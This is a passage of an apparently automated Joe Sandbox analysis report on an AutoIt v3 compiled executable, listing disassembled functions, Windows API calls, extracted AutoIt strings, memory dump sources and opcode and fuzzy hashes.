                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                      • Instruction ID: 11b604bd352361c3b6d9f6158aa0db2810212eb1bfe2e9547d258a90c76a202a
                                                                      • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                                                                      • Instruction Fuzzy Hash: BFC174362055930ADF2E463A847403EFFA17EA37B1B1A0B5DE4B3CB1D4EE20D965D620
                                                                      Function 005325FA Relevance: .3, Instructions: 341COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                      • Instruction ID: 104a095be4447dc8f05ed9cb57e2b7fb3c83f19be8ec11083e6cc8c312b25d60
                                                                      • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                                                                      • Instruction Fuzzy Hash: 66C163332059930ADF2E463A843413EFFA17EA37B1B1A076DD4B2DB1D5EE20C925D620
                                                                      Function 00531978 Relevance: .3, Instructions: 323COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                      • Instruction ID: a47f30e447a46fe4891929d8c0d938094a0ee04627f7ea6a8b1f4132119c5f42
                                                                      • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                                                                      • Instruction Fuzzy Hash: 2CC1703220599309DF2E463AC47413EFFA16EA37B271A1B6DD4B3CB1C4EE20C925D664
                                                                      Function 010375B8 Relevance: .1, Instructions: 92COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1302191664.0000000001033000.00000040.00000020.00020000.00000000.sdmp, Offset: 01033000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1033000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                      • Instruction ID: 2a0a1c95a1e96e136acfa13d45aea406602fff6760dbc685a731145c86515fd9
                                                                      • Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
                                                                      • Instruction Fuzzy Hash: 8E41D571D1051CDBCF48CFADC991AEEBBF2AF88201F548299D556AB345D730AB41DB40
                                                                      Function 010374A8 Relevance: .0, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1302191664.0000000001033000.00000040.00000020.00020000.00000000.sdmp, Offset: 01033000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1033000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                      • Instruction ID: 960047e87d37854bdb6c4da62278ce4257f22527fae9baeebf1ba513c93630a4
                                                                      • Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
                                                                      • Instruction Fuzzy Hash: 120192B8A00209EFCB54DF98C5909AEF7F9FB88310F208599D849A7741D730AE51DB80
                                                                      Function 01037448 Relevance: .0, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1302191664.0000000001033000.00000040.00000020.00020000.00000000.sdmp, Offset: 01033000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1033000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                      • Instruction ID: c48d9ea4d97d65a31c19865d15d59b3aac2a114e6b4c7aeff4eba7728c9f852c
                                                                      • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                      • Instruction Fuzzy Hash: FE019678A00109EFCB44DF98C5909AEF7F9FB88310F208599D85597705D730AE41DB80
                                                                      Function 01035E38 Relevance: .0, Instructions: 6COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1302191664.0000000001033000.00000040.00000020.00020000.00000000.sdmp, Offset: 01033000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_1033000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                      • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                      • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                      • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                      Function 00587806 Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 491filecommemoryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DeleteObject.GDI32(00000000), ref: 0058785B
                                                                      • DeleteObject.GDI32(00000000), ref: 0058786D
                                                                      • DestroyWindow.USER32 ref: 0058787B
                                                                      • GetDesktopWindow.USER32 ref: 00587895
                                                                      • GetWindowRect.USER32(00000000), ref: 0058789C
                                                                      • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 005879DD
                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 005879ED
                                                                      • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00587A35
                                                                      • GetClientRect.USER32(00000000,?), ref: 00587A41
                                                                      • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00587A7B
                                                                      • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00587A9D
                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00587AB0
                                                                      • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00587ABB
                                                                      • GlobalLock.KERNEL32(00000000), ref: 00587AC4
                                                                      • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00587AD3
                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00587ADC
                                                                      • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00587AE3
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00587AEE
                                                                      • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00587B00
                                                                      • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,005A2CAC,00000000), ref: 00587B16
                                                                      • GlobalFree.KERNEL32(00000000), ref: 00587B26
                                                                      • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 00587B4C
                                                                      • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 00587B6B
                                                                      • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00587B8D
                                                                      • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00587D7A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                      • String ID: $AutoIt v3$DISPLAY$static
                                                                      • API String ID: 2211948467-2373415609
                                                                      • Opcode ID: 66c92eb023c13e63f63a0df203d6249757eb1ee4d7569c85d64736bab63d40e1
                                                                      • Instruction ID: a60c6a59d721231c648af2421ec2adeeafd54ea45621eb784f8d60644cb95cd5
                                                                      • Opcode Fuzzy Hash: 66c92eb023c13e63f63a0df203d6249757eb1ee4d7569c85d64736bab63d40e1
                                                                      • Instruction Fuzzy Hash: 3C026A75900109AFDB14DFA4DC89EAE7BB9FB48310F14815AF915EB2A1CB30ED45DB60
                                                                      Function 0059356B Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CharUpperBuffW.USER32(?,?,0059F910), ref: 00593627
                                                                      • IsWindowVisible.USER32(?), ref: 0059364B
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: BuffCharUpperVisibleWindow
                                                                      • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                      • API String ID: 4105515805-45149045
                                                                      • Opcode ID: 38dbe5f95d6a16b3f398317b0df359333763fc9763da9e67586fc15f8cc67126
                                                                      • Instruction ID: 6f0cb16492441ac53019650060e81dbfbeb0c937fc92626aae75349e852a0d45
                                                                      • Opcode Fuzzy Hash: 38dbe5f95d6a16b3f398317b0df359333763fc9763da9e67586fc15f8cc67126
                                                                      • Instruction Fuzzy Hash: 9ED12970208302DFCF14EF50C569AAE7FE5BF95354F144868F8865B2A2DB21EE4ACB45
                                                                      Function 0059A5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetTextColor.GDI32(?,00000000), ref: 0059A630
                                                                      • GetSysColorBrush.USER32(0000000F), ref: 0059A661
                                                                      • GetSysColor.USER32(0000000F), ref: 0059A66D
                                                                      • SetBkColor.GDI32(?,000000FF), ref: 0059A687
                                                                      • SelectObject.GDI32(?,00000000), ref: 0059A696
                                                                      • InflateRect.USER32(?,000000FF,000000FF), ref: 0059A6C1
                                                                      • GetSysColor.USER32(00000010), ref: 0059A6C9
                                                                      • CreateSolidBrush.GDI32(00000000), ref: 0059A6D0
                                                                      • FrameRect.USER32(?,?,00000000), ref: 0059A6DF
                                                                      • DeleteObject.GDI32(00000000), ref: 0059A6E6
                                                                      • InflateRect.USER32(?,000000FE,000000FE), ref: 0059A731
                                                                      • FillRect.USER32(?,?,00000000), ref: 0059A763
                                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0059A78E
                                                                        • Part of subcall function 0059A8CA: GetSysColor.USER32(00000012), ref: 0059A903
                                                                        • Part of subcall function 0059A8CA: SetTextColor.GDI32(?,?), ref: 0059A907
                                                                        • Part of subcall function 0059A8CA: GetSysColorBrush.USER32(0000000F), ref: 0059A91D
                                                                        • Part of subcall function 0059A8CA: GetSysColor.USER32(0000000F), ref: 0059A928
                                                                        • Part of subcall function 0059A8CA: GetSysColor.USER32(00000011), ref: 0059A945
                                                                        • Part of subcall function 0059A8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 0059A953
                                                                        • Part of subcall function 0059A8CA: SelectObject.GDI32(?,00000000), ref: 0059A964
                                                                        • Part of subcall function 0059A8CA: SetBkColor.GDI32(?,00000000), ref: 0059A96D
                                                                        • Part of subcall function 0059A8CA: SelectObject.GDI32(?,?), ref: 0059A97A
                                                                        • Part of subcall function 0059A8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 0059A999
                                                                        • Part of subcall function 0059A8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0059A9B0
                                                                        • Part of subcall function 0059A8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 0059A9C5
                                                                        • Part of subcall function 0059A8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0059A9ED
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                      • String ID:
                                                                      • API String ID: 3521893082-0
                                                                      • Opcode ID: c3a475b3f460948e080f58fbe2cfc04861b632a7659b6be0848eea80771e61e4
                                                                      • Instruction ID: c2cc1b81c6041aa9421dec3a96162f15d0c6f8b6a3f904e90bd247eb2ed2e36c
                                                                      • Opcode Fuzzy Hash: c3a475b3f460948e080f58fbe2cfc04861b632a7659b6be0848eea80771e61e4
                                                                      • Instruction Fuzzy Hash: DD918E72408301FFCB109F64DC08A5B7BA9FF88321F151B2AF962D61A0D771D948DBA2
                                                                      Function 00512C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DestroyWindow.USER32(?,?,?), ref: 00512CA2
                                                                      • DeleteObject.GDI32(00000000), ref: 00512CE8
                                                                      • DeleteObject.GDI32(00000000), ref: 00512CF3
                                                                      • DestroyIcon.USER32(00000000,?,?,?), ref: 00512CFE
                                                                      • DestroyWindow.USER32(00000000,?,?,?), ref: 00512D09
                                                                      • SendMessageW.USER32(?,00001308,?,00000000), ref: 0054C43B
                                                                      • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 0054C474
                                                                      • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 0054C89D
                                                                        • Part of subcall function 00511B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00512036,?,00000000,?,?,?,?,005116CB,00000000,?), ref: 00511B9A
                                                                      • SendMessageW.USER32(?,00001053), ref: 0054C8DA
                                                                      • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 0054C8F1
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0054C907
                                                                      • ImageList_Destroy.COMCTL32(00000000,?,?), ref: 0054C912
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                      • String ID: 0
                                                                      • API String ID: 464785882-4108050209
                                                                      • Opcode ID: 5ec00df950997b923ba4a64ab4d87d1c9534da7214f586eefa6bd329fb96cfae
                                                                      • Instruction ID: df2ef6d5792170da2b84d0c1df00e0358662fb8d586ef7fb16002ae7075d33cc
                                                                      • Opcode Fuzzy Hash: 5ec00df950997b923ba4a64ab4d87d1c9534da7214f586eefa6bd329fb96cfae
                                                                      • Instruction Fuzzy Hash: 21128C30601201AFEB55CF24C888BE9BFA5FF84308F558569E595CB262C731EC96DB91
                                                                      Function 005874AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • DestroyWindow.USER32(00000000), ref: 005874DE
                                                                      • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0058759D
                                                                      • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 005875DB
                                                                      • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 005875ED
                                                                      • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 00587633
                                                                      • GetClientRect.USER32(00000000,?), ref: 0058763F
                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 00587683
                                                                      • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00587692
                                                                      • GetStockObject.GDI32(00000011), ref: 005876A2
                                                                      • SelectObject.GDI32(00000000,00000000), ref: 005876A6
                                                                      • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 005876B6
                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 005876BF
                                                                      • DeleteDC.GDI32(00000000), ref: 005876C8
                                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 005876F4
                                                                      • SendMessageW.USER32(00000030,00000000,00000001), ref: 0058770B
                                                                      • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 00587746
                                                                      • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 0058775A
                                                                      • SendMessageW.USER32(00000404,00000001,00000000), ref: 0058776B
                                                                      • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 0058779B
                                                                      • GetStockObject.GDI32(00000011), ref: 005877A6
                                                                      • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 005877B1
                                                                      • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 005877BB
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                                                                      • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                                                                      • API String ID: 2910397461-517079104
                                                                      • Opcode ID: ae66cb85f237147a8bcc67e275406db101f41c6717458a560b567b2e57641afc
                                                                      • Instruction ID: b8058cf752d6c6513d6da82ff98ce755985150e6f3619dfeeede34f84858d82b
                                                                      • Opcode Fuzzy Hash: ae66cb85f237147a8bcc67e275406db101f41c6717458a560b567b2e57641afc
                                                                      • Instruction Fuzzy Hash: 78A15C71A40609BFEB24DBA4DC4AFAE7BA9FB58710F104116FA15E72E0D770AD04DB60
                                                                      Function 0057AD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0057AD1E
                                                                      • GetDriveTypeW.KERNEL32(?,0059FAC0,?,\\.\,0059F910), ref: 0057ADFB
                                                                      • SetErrorMode.KERNEL32(00000000,0059FAC0,?,\\.\,0059F910), ref: 0057AF59
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorMode$DriveType
                                                                      • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                      • API String ID: 2907320926-4222207086
                                                                      • Opcode ID: e4a0ffab4826577c0f828157807395c6cb6a8860efe0ca76e454fc195b456f48
                                                                      • Instruction ID: cd0ead61103230e153771c60f2869f51934abaeb60ba6e18acf9917633911c84
                                                                      • Opcode Fuzzy Hash: e4a0ffab4826577c0f828157807395c6cb6a8860efe0ca76e454fc195b456f48
                                                                      • Instruction Fuzzy Hash: 715190B564820AAE8B10DB50E956DBD7F64FBC8714B20C45BE40AA72D0EA319D41FB43
                                                                      Function 005168DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301239415.00000000005CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301308798.00000000005D7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_0_2_510000_z6tNjJC614.jbxd
                                                                      Similarity
                                                                      • API ID: __wcsnicmp
                                                                      • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                      • API String ID: 1038674560-86951937
                                                                      • Opcode ID: 3b125e3ea3b5bed90c114143fd2bf6901373e88937e35e86e6d34901a6c1b6d9
                                                                      • Instruction ID: d3f322a6ff953a7b6e386a6b34bc4241ec403f3c0785d21f27905e4cedb91893
                                                                      • Opcode Fuzzy Hash: 3b125e3ea3b5bed90c114143fd2bf6901373e88937e35e86e6d34901a6c1b6d9
                                                                      • Instruction Fuzzy Hash: BC8106B0640206ABEF21AE64EC4BFFE3F69FF45704F044024F905AB196EB71DA85D661
                                                                      Function 00599A1C Relevance: 42.5, APIs: 23, Strings: 1, Instructions: 455windowCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 00599AD2
                                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 00599B8B
                                                                      • SendMessageW.USER32(?,00001102,00000002,?), ref: 00599BA7
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000000.00000002.1301131953.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                      • Associated: 00000000.00000002.1301114139.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.000000000059F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                      • Associated: 00000000.00000002.1301189759.00000000005C4000.00000002.00000001.01000000.00000003.sdmpDownload File
